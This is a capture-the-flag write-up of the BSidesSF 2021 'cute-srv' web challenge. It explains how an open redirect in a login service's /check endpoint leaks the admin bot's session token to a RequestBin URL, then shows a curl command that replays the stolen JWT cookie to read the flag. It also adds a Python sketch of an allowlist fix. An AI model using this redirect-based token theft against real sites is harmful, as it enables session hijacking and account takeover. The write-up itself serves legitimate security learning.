Check out https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#cute-srv for writeup with images.


This challenge was fun, cute and straight-forward once the bug is found.

First we're presented with a page of cute photos and the nav bar allows us to Login or Submit a new image for review.

Looking in the source, there's a /flag.txt route which must be the goal of the challenge, but when visiting it we get a message 'Not Authorized'.

If we visit Login we can click the only link available and it will automatically log us in and redirect us to the main page.

On /submit we can submit a URL which the admin will visit. This is typical in a lot of CSRF challenges, so we can start by checking the User-Agent and other features when it visits our link, pointing it to a server we own or using something like https://requestbin.io/.

Even if we find XSS, the site is using HttpOnly cookies, so we probably need to find something else.

Checking out the Login route again while watching the requests, it does something interesting. The /check endpoint of the login service redirects to the URL given in its continue parameter and appends the session token to that URL, but it does not restrict which URL it redirects to. Using this open redirect we can force the Admin user to send their own session token to our site instead.

We can use RequestBin again to steal the session token authtok, submitting this link to the admin:

https://loginsvc-0af88b56.challenges.bsidessf.net/check?continue=https%3A%2F%2Frequestbin.io%2F1oar7lu1
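The bug above is an open redirect that carries a credential. As an added example (not code from the challenge or the original writeup), here is the redirect logic the writeup describes beside a hardened version that only follows an allowlisted continue URL. The cutesrv hostname is the one from the challenge; the function names, the allowlist and the placeholder token are assumptions for illustration.

```python
from urllib.parse import urlsplit, urlunsplit, urlencode

# Hostname from the challenge; the allowlist and default are assumptions.
CUTESRV_HOST = "cutesrv-0186d981.challenges.bsidessf.net"
ALLOWED_CONTINUE_HOSTS = {CUTESRV_HOST}
DEFAULT_CONTINUE = f"https://{CUTESRV_HOST}/"


def append_query(url: str, params: dict) -> str:
    """Append params to the query string of url, keeping any existing query."""
    parts = urlsplit(url)
    extra = urlencode(params)
    query = f"{parts.query}&{extra}" if parts.query else extra
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))


def vulnerable_check_redirect(continue_url: str, authtok: str) -> str:
    """Behaviour the writeup describes: /check sends the caller wherever
    ?continue= says and tacks the session token onto that URL."""
    return append_query(continue_url, {"authtok": authtok})


def is_safe_continue(continue_url: str) -> bool:
    """Accept only an absolute https URL whose host is on the allowlist.

    urlsplit puts the real host of 'https://trusted@evil.example/' in
    .hostname (and 'trusted' in .username), and parses a scheme-relative
    '//evil.example/' with an empty scheme, so both are rejected here.
    """
    if not continue_url or len(continue_url) > 2048:
        return False
    # Backslashes and control characters are normalised to '/' by some
    # browsers, so refuse them rather than guess how they will be parsed.
    if any(c in continue_url for c in "\\\r\n\t"):
        return False
    parts = urlsplit(continue_url)
    if parts.scheme != "https":
        return False
    if parts.username or parts.password:
        return False
    host = parts.hostname  # already lower-cased by urlsplit, port stripped
    return host is not None and host in ALLOWED_CONTINUE_HOSTS


def hardened_check_redirect(continue_url: str, authtok: str) -> str:
    """Fall back to the application's own origin when continue is not trusted."""
    target = continue_url if is_safe_continue(continue_url) else DEFAULT_CONTINUE
    return append_query(target, {"authtok": authtok})


if __name__ == "__main__":
    # Constructed inputs: the RequestBin URL from the writeup and a placeholder token.
    bad = "https://requestbin.io/1oar7lu1"
    print(vulnerable_check_redirect(bad, "<authtok>"))  # token leaves the site
    print(hardened_check_redirect(bad, "<authtok>"))    # token stays on cutesrv
```

Allowlisting the host closes the redirect, but the token is still in a URL, where it ends up in browser history, proxy logs and Referer headers; a one-time code exchanged server-side, or a cookie set directly on the application's origin, avoids that exposure entirely.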

Now we can reach the /flag.txt route which is only available to the admin:

curl https://cutesrv-0186d981.challenges.bsidessf.net/flag.txt \
  -b 'loginsid=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhdXRodG9rIiwiZXhwIjoxNjE4NDYyMjkyLCJpYXQiOjE2MTU3ODM4OTIsImlzcyI6ImxvZ2luc3ZjIiwibmJmIjoxNjE1NzgzODkyLCJzdWIiOiJhZG1pbiJ9.iA3lgwhmhOPNKh0_Wxmi923EOWdcUWcS-cIA_lxPhtExEGMeGkep3zweJ-MXtFyOwiDnMZ7Uuyuth9mFQ0lpMQ'

And we get the Flag!

FLAG: CTF{i_hope_you_made_it_through_2020_okay}
Original writeup (https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#cute-srv).